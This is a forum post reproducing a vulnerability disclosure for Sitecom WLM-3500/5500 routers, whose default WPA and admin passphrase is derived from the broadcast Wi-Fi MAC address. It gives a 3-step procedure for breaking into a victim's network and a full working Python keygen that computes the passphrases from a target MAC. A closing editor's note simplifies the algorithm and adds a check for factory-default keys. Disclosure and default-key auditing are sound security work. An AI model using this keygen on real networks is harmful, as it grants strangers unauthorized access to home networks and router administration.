Sitecom WLM-3500 and WLM-5501 WPS Keygen 1

  1. Mr. Penguin
    Affected Sitecom devices are shipped with an 8-letter WPA/WPA2 passphrase, printed on a sticker attached to the underside of the device. The very same passphrase can also be used to authenticate to the router web interface, with administrative privileges. At first glance, this key looks like a random sequence of eight lowercase and uppercase letters. However, our analysis revealed that this 8-letter key is not random at all: it can be generated from publicly-accessible information, namely the MAC address of the wireless interface.

    [Figure: Generating the WPA/admin passphrase from publicly-accessible information]
    This kind of issue is not new: in the past, several other device models were shown to derive the wireless passphrase from the MAC address and/or the Wi-Fi SSID (the original post links a few examples, and there are many others). To the best of our knowledge, this is the first time Sitecom devices have been shown to be vulnerable as well.

    More in detail, an attacker can connect to a vulnerable Sitecom Wi-Fi network through a simple 3-step procedure:
    1. Move within range of the wireless network and capture the router's Wi-Fi MAC address.
    2. Apply the Sitecom key generation algorithm, which derives the default WPA passphrase from the Wi-Fi MAC address.
    3. Use the generated WPA key to access the victim's wireless network, unless the user has changed it by configuring a different Wi-Fi passphrase.
    Of course, the challenge for the attacker is to determine which algorithm was used to generate the WPA key from the Wi-Fi MAC address. In the case of the affected Sitecom routers, the key generation algorithm was included right inside the device firmware, where it is used during the "factory reset" procedure to re-generate the default WPA passphrase.

    To demonstrate this attack, we reconstructed the WPA key generation algorithm and implemented it in a Python script (linked in the original post). Usage is very simple: just invoke the script with the MAC address of the target Wi-Fi network, as shown below. The script outputs both the key for the WLM-3500 and the two passphrases for the dual-band WLM-5500.

    Code:
#
# Sitecom N300/N600 default WPA/admin key calculator
# ==================================================
#
# Authors:
#   Roberto Paleari (roberto.paleari@emaze.net, @rpaleari)
#   Alessandro Di Pinto (alessandro.dipinto@emaze.net, @adipinto)
#
import string
import sys

# 55-symbol alphabet used by the firmware (the visually ambiguous 0/i/l/o/I/L/O are absent)
CHARSET = "123456789abcdefghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ"


def increment_hex(hexchar):
    # Advance a single hex digit by one, wrapping around string.hexdigits
    hexchar = hexchar.upper()
    assert hexchar in string.hexdigits
    return string.hexdigits[(string.hexdigits.find(hexchar) + 1) % len(string.hexdigits)]


def mangle_key(mac, op1, op2):
    # 32-bit arithmetic lifted from the firmware: a multiply-by-reciprocal
    # sequence that reduces op1 * op2 modulo len(CHARSET) and indexes the alphabet
    def LO(v):
        return v & 0xffffffff

    def HI(v):
        return (v >> 32) & 0xffffffff

    a0 = LO(op1 * op2)
    v0 = HI(a0 * 0x94f2095)
    v1 = v0 >> 1
    v0 = a0 >> 31
    v1 = v1 - v0
    v0 = v1
    v0 = LO(v0 << 3) - v1
    v0 = LO(v0 << 3) - v1
    v0 = a0 - v0
    return CHARSET[v0]


def calculate_key(mac):
    # mac: 12 hex digits, upper case, no separators
    key = [0] * 8

    # Leading decimal digits of the second half of the MAC, read as an integer
    secondhalf = "0"
    for c in mac[6:]:
        if c.isdigit():
            secondhalf += c
        else:
            break
    secondhalf = int(secondhalf)

    # Each key character is derived from the ASCII codes of a few MAC digits
    mac = [ord(x) for x in mac]
    opmap = [
        (mac[11] + mac[5] + secondhalf, mac[9] + mac[11] + mac[3]),
        (mac[11] + mac[6] + secondhalf, mac[8] + mac[11] + mac[10]),
        (mac[3] + mac[5] + secondhalf, mac[7] + mac[11] + mac[9]),
        (mac[11] + mac[4] + mac[5], mac[6] + mac[7] + secondhalf),
        (mac[6] + mac[7] + secondhalf, mac[8] + mac[11] + mac[9]),
        (mac[11] + mac[3] + mac[4], mac[5] + mac[11] + secondhalf),
        (mac[11] + mac[6] + mac[8], mac[4] + mac[11] + secondhalf),
        (mac[11] + mac[7] + mac[8], mac[10] + mac[11] + secondhalf),
    ]
    for i in range(8):
        op1, op2 = opmap[i]
        key[i] = mangle_key(mac, op1, op2)
    return "".join(key)


def main():
    if len(sys.argv) != 2:
        print("[!] Syntax: python %s <MAC address>" % sys.argv[0], file=sys.stderr)
        sys.exit(1)

    mac = sys.argv[1]
    if ":" in mac:
        mac = mac.replace(":", "")
    seed = mac.upper()

    print("==== Single-band (N300/WLM-3500) ====")
    key = calculate_key(seed)
    print("KEY 2.4GHz:", key)
    print()

    # Dual-band models derive each radio's key from the MAC with its last hex digit incremented
    print("==== Dual-band (N600/WLM-5500) ====")
    last = seed[-1]
    for i in range(2):
        last = increment_hex(last)
        key = calculate_key(seed[:-1] + last)
        if i == 0:
            print("KEY 5GHz: ", key)
        else:
            print("KEY 2.4GHz:", key)


if __name__ == "__main__":
    main()
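Editor's note on the script above, added here and not part of the original post or the Emaze script: the shift/multiply sequence in mangle_key is a compiler's idiom for division by 55 (0x94f2095 is ceil(2^33 / 55)), so every key character is just CHARSET[(op1 * op2) % 55] and the passphrase is a fixed function of the last nine hex digits of the MAC. The block reproduces mangle_key as the reference, verifies the equivalence exhaustively, and wraps the simplified form in a defender-side check of whether a router's configured passphrase is still the factory default (function names and the sample MACs are the editor's, constructed for illustration).

```python
# The firmware's 55-symbol alphabet, exactly as in the post's script
CHARSET = "123456789abcdefghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ"

def mangle_key(op1, op2):
    # The post's mangle_key, kept as the reference form (unused mac argument dropped)
    LO, HI = (lambda v: v & 0xffffffff), (lambda v: (v >> 32) & 0xffffffff)
    a0 = LO(op1 * op2)
    v0 = HI(a0 * 0x94f2095)
    v1 = v0 >> 1
    v0 = a0 >> 31
    v1 = v1 - v0
    v0 = v1
    v0 = LO(v0 << 3) - v1
    v0 = LO(v0 << 3) - v1
    return CHARSET[a0 - v0]

def mod55_key(op1, op2):
    # 0x94f2095 == ceil(2**33 / 55): the HI and >>1 steps give q = a0 // 55 and the two
    # "<<3 minus" steps give 55*q, so the routine is (op1*op2) % 55 for any product < 2**31
    return CHARSET[(op1 * op2) % 55]

def equivalence_holds(limit=300):
    # Exhaustive comparison of both forms for every operand pair below `limit`
    return all(mangle_key(a, b) == mod55_key(a, b)
               for a in range(limit) for b in range(limit))

def default_key(mac, mangler=mod55_key):
    # Default passphrase for a 12-hex-digit MAC (colons allowed), same opmap as the post
    m = mac.replace(":", "").upper()
    assert len(m) == 12 and all(c in "0123456789ABCDEF" for c in m)
    digits = "0"
    for c in m[6:]:              # leading decimal digits of the second half
        if not c.isdigit():
            break
        digits += c
    sh = int(digits)
    m = [ord(c) for c in m]
    opmap = [
        (m[11] + m[5] + sh, m[9] + m[11] + m[3]),
        (m[11] + m[6] + sh, m[8] + m[11] + m[10]),
        (m[3] + m[5] + sh, m[7] + m[11] + m[9]),
        (m[11] + m[4] + m[5], m[6] + m[7] + sh),
        (m[6] + m[7] + sh, m[8] + m[11] + m[9]),
        (m[11] + m[3] + m[4], m[5] + m[11] + sh),
        (m[11] + m[6] + m[8], m[4] + m[11] + sh),
        (m[11] + m[7] + m[8], m[10] + m[11] + sh),
    ]
    return "".join(mangler(a, b) for a, b in opmap)

def is_factory_default(mac, passphrase):
    # Defender check: is the configured passphrase still the MAC-derived default?
    return passphrase == default_key(mac)
```

Passing `mangle_key` as the `mangler` argument lets you confirm that the simplified form produces the same passphrase as the post's arithmetic for any MAC.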